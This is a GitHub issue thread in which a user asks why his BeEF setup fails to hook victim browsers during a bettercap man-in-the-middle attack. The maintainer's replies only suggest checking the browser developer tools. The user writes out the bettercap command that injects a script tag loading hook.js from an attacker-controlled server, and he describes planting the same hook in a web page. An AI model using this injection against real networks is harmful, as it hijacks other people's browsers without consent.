### ISSUE TITLE
BeEF Framework - cant see anything hooked to online or offline browsers files.

### ISSUE THREAD

**Issue by Daniel-Khoon** [beefproject/beef#2814]
im using ubuntu linux 22.04.2 LTS as primary OS
beef version: 0.5.4.0
i have beef listening on all ports 0.0.0.0 configures in "config.yaml"
and i use bettercap to perform a MITM attack and i use "http.inject.code <script src='http://my-ip:3000/hook.js' ></script
and beef is runing fine and bettercap is runing fine.
The problem is that i cannot hook the victim machine to beef and i see nothing in both online and offline browsers files in beef.
i do see in the "logs" option that the victim machine ip is successfully authinticated in the application.
The wierd thing is when i was using beef on another machine i was allways seeing my own machine and 127.0.0.1 hooked to the offline browsers.
thanks for your help.

**Comment by Daniel-Khoon** [comment]
Well what i cant understand why does it not getting hooked too.
im doing everything the same way as i allways do. so i dont know what im missing exactly.

> There's not enough information to answer your question. If you can tell me why BeEF is not being hooked I can tell you how to fix it.
> 
> I suggest starting with the browser developer tools - in particular the console and network tabs.
> 
> > i do see in the "logs" option that the victim machine ip is successfully authinticated in the application.
> 
> That log message means that you logged in - not that a hook was received.

**Comment by Daniel-Khoon** [comment]
> > Well what i cant understand why does it not getting hooked too.
> 
> Start with the browser developer tools - in particular the console and network tabs.

i have tried another way and beef worked.
i just added to my index.html file using apache2 in /var/www/html file the injection script to beef and it worked when i entered the ip on the victim machine.

i did the same this only i tried to inject it using bettercap.

here is how:
i become MITM using bettercap and i use sniffing too and bettercap is runing fine.
i run this code that should hook http sites that the victim machine enters:
set http.inject.code <script src="http.my-ip:3000.hook.js"></script>
am i doing something wrong ?

**Comment by bcoles** [comment]
> am i doing something wrong ?

It is impossible to say. There is not enough information to answer your question.
